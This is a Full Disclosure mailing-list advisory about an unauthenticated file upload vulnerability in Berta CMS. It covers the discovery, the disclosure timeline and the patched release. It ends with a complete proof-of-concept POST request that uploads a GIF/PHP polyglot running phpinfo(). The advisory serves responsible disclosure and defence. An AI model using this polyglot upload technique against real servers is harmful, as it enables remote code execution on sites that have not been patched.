'[FD] Insecure file upload in Berta CMS'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [FD] Insecure file upload in Berta CMS
From:       Simon Waters <simon.waters () surevine ! com>
Date:       2015-03-26 18:01:09
Message-ID: F9EED012-4100-4170-8C48-FF3050869169 () surevine ! com
[Download RAW message or body]

Berta CMS is a web based content management system using PHP and local file storage.

http://www.berta.me/

Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought \
to our attention we checked the file upload functionality of this software.

We found that the file upload didn't require authentication.

Images with a ".php" extension could be uploaded, and all that was required is that they pass \
the PHP getimagesize() function and have suitable dimensions.

It is possible for GIF image files (and possibly other image files - not tested) to contain \
arbitrary PHP whilst being well enough formed to pass the getimagesize() function with \
acceptable dimensions.

http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ \
<http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>

We can't ascertain if this is the weakness that was used to compromise the 3rd party server in \
question, however the patch requires authentication for all file uploads, which will likely \
resolve any similar issues.

The author was notified: 2015-03-22
Author Acknowledge: 2015-03-23
Patch released: 2015-03-26

The berta-0.8.10b.zip file from: http://www.berta.me/download/  includes a fix that requires \
authentication to upload files.

This announcement should not be interpreted as implying either the author, or Surevine, have \
conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes \
you just want to make life harder for those sending phishing emails).

The following POST request will upload a c.php file which will run phpinfo() when fetched on \
vulnerable servers.

POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; \
                boundary=---------------------------2147563051636691175750543802
Content-Length: 1617

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php

GIF89/* <  ³ Ã¿Ã¿Ã¿fffÃŒÃŒÃŒ333ÃŒÃ¿Ã¿â„¢â„¢â„¢3ffÃŒÃŒÃ¿ÃŒÃ¿ÃŒâ„¢â„¢ÃŒf3f 33 fâ„¢â„¢3 3 3!Ã¾ GIF \
SmartSaver Ver1.1a , Ãˆ < Ã¾ ÃˆI « ½8Ã«Ã »Ã¿`(Å½diÅ¾h ª ®lÃ« ¾p,ÃtmÃŸx ®Ã¯|Ã¯Ã¿Ã€ p ¸ Ãˆ \
¤râ„¢$Ã¶Ëœ 4Ãª ¬Z ¯Ã• cÃ‹Ãz ¿`n { â€ž 2-xLn »ÃŸÃ© ³|ÃŽ` «  \
¼^O6â€¡Ã£kpâ€šÆ’â€ž#jtË†]v)~`}gâ‚¬_â€¹â€¦"â€¢â€¢â€¡â€°â€°"' _ 1ËœÅ â€“ ¤ ¥â€š ¢â„¢sâ€º& ^Å¸Å½ \
¡a « ¦ ´ µ? ¨ ©g ³$ ] ¯Å¾ ±  ¶ÃƒÃ„< ¸ ¹Ã‚w X ½\â€˜^ »Ã…Ã’Ã“+Ã‡ÃˆÃ,Ã[Ã”%Ã‡Ã‘ÃœÃ Ã¡)Ã–ÃŸÃ™Ã‹Ã¢ \
ÃžÃ¨Ã«Ã¬'Ã¤eÃ§ MÃŒJ ÃªÃÃ¸Ã¹Ã¶ º x{{ Ã¼Ã½ Pâ‚¬â€š64  Ã°VpÃƒ@> 8PÆ’Ã„3 R ±pOÅ¸Ã‡ Ã¾ ÃžU8Ëœ!@Ëœ \
(SbL9 a "Å¡6Z8 · ° Ã‰ 03 ) ¡#ÃˆÅ¸Ã¸D Å’Ã·Ã²Ã¤ µI  ¬ qY RNâ€ºD $ ½Ã†â‚¬ §O XÃ…	 p  §Qdâ€¹ P s \
cËœ ® &'y5 «Ã›i[Ã“F Ã° ´â€¹R~ Ã„Å½%Ã›4 Z { · ÃÃ¶ a[q ¥ÃŽâ€¢Pâ€”Ã‹]Yy oâ„¢â€žmc/*Ã¥l,| ¸3 \
©Ã„ )\fÃ°XËœd.L+Ã‡"Ãƒ Ã€h ¾ 8{Å¾M Ã´bÃ—'â€¡â€š**GÃ£EÅ’ TÃ¯>Ã˜ ºgnÃ£Ã‰h+/d{ ·â€¦Ã‘Æ’ \
¹FU;Ã±9Ã«	â€°Xv} A/ ¬Ã˜ â€”â€¹ Ã”Ã¼ »u0Ã‘Ã¥:g ÃƒÃ«Ã´ ªxv-Ã€'Ã¥ ¬ ® ²Ã‡Ã«'R ËœWÃ´ ºâ„¢Ã¾' f \
XCÃ…uÃ½ÃœÃ† ~Ã¡ÃÃ§ Ã½ ¹Ã¢ÃžqÃª	xÃ7Ãž}Ã‘P{	 ®Ã§ Ã–â€žÃ”Ã Æ’$  ¡/ (Ãz zQÃœLÃ¡Ã¡Ã• ¡â‚¬ \
Ã½6â€¡Ë†Ã‰â€¢ ¨c ':"Ã¢ Ã©) ¶ w Ã < H £A5Ã¥â€š £$;FÃ‰ £Å’JÃºw Z	Å¾Å  -Æ’$  ¡IÃµ "Ob#Ã¥â„¢8Ã´ \
¸Ã Ëœe)aâ„¢vu@Ã¤â€” â€ž6f"pÅ  Ã¦Å¾5 ¨â€°Ã XVÃ¹&r v	 3jy'Å¾â€žÅ¡Ã‰Ã§ £/Ã¸Y â€¦B
h ¤Å“^Å¾ f<â€¹'FPâ€¹(n	% ¤ ¤ ² )â€ºq
*{\j0 § ¦uÅ¾ *f; ©Ãª £ ¨Å½â€“ ª «	 § Ãš ¦ kÃ’ ¥`Å¾â€š
k ¢oZÃ“  ² ¡Ã¾Ã¦ ·Ã« ³ Ã´zÃ¥ ¯ j9Ã« / º9*/<?php phpinfo(); ?>/*
`Ã‡Å½ ´ÃŒ µ °U . ±Ã¡BkÃ®>#VÃ«E'  ¦ ªÃ® ªâ€¢ Å j v «   £Ã  ¹Ã¥Å“Ã«/ ® ¹ ¾â€¹ Ã†;h »6 D  ·` \
°k0Å Ã‡ H ¡ ³Ã¿Ãºâ€º ÃƒÃ²N n Ã„Ã±f/ ¹ ¤aÃ· ±Ã€kFÃœ â€¡ WlÃ®Ã…ÃŠÃŠ4f c ¶Q s ´6  ¢Ë†z ÃŠ1/RÃ‡ \
¯ÃŠ@WpÃ± â„¢Ã‰  ³& ¸  Ã‡]AÃ¦|Ã¯Å¡ ¯Ã± n ± O Ã´Ã• o+Ã®i! â€   ¥!""Ã“Ã€"4Ãµ  ¥â€”2Ã– ¤^ \
Ã³X0wÃŠâ€ Zâ„¢ ´F6Ã‰ rÃuÃ–V ³  ²Ã› Ã’ Ã³Ã”zÃ¢ Hqw?|kÃ â€šÃ¿Ã¬wÃ…nÃ³Ã½UÃ†'k Ã¸Ã¡â€¡e |Ã¹Å¸â€¢ \
£7Å¡Ã£ [L%Gâ€šÃ£A ©Ã¡}â€¹â€“Kuâ„¢7 ¼Ã©za q- kâ€¡Å½fÃ¤ ¬â€  · ¯ ¯ £Å½Ã”Ã© ² $nÃ§ Ã€k v º ¶'o \
D(Ã¥Ã¡ °< Ã©Qâ‚¬ ` £` q}FÃ™*Ã¯Ã½Ã·Ã â€¡/Ã¾Ã¸Ã¤â€”oÃ¾Ã¹Ã¨ § ¯Ã¾ÃºÃ¬ \
·Ã¯Ã¾Ã»Ã°Ã‡/Ã¿Ã¼Ã´Ã—oÃ¿Ã½Ã¸Ã§ ¯Ã¿Ã¾Ã¼Ã·Ã¯Ã¿Ã¿  ;

-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------2147563051636691175750543802--

Simon Waters

phone  +448454681066
email  simon.waters@surevine.com
skype  simon.waters.surevine

Participate | Collaborate | Innovate

Surevine Limited

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[prev in list] [next in list] [prev in thread] [next in thread] 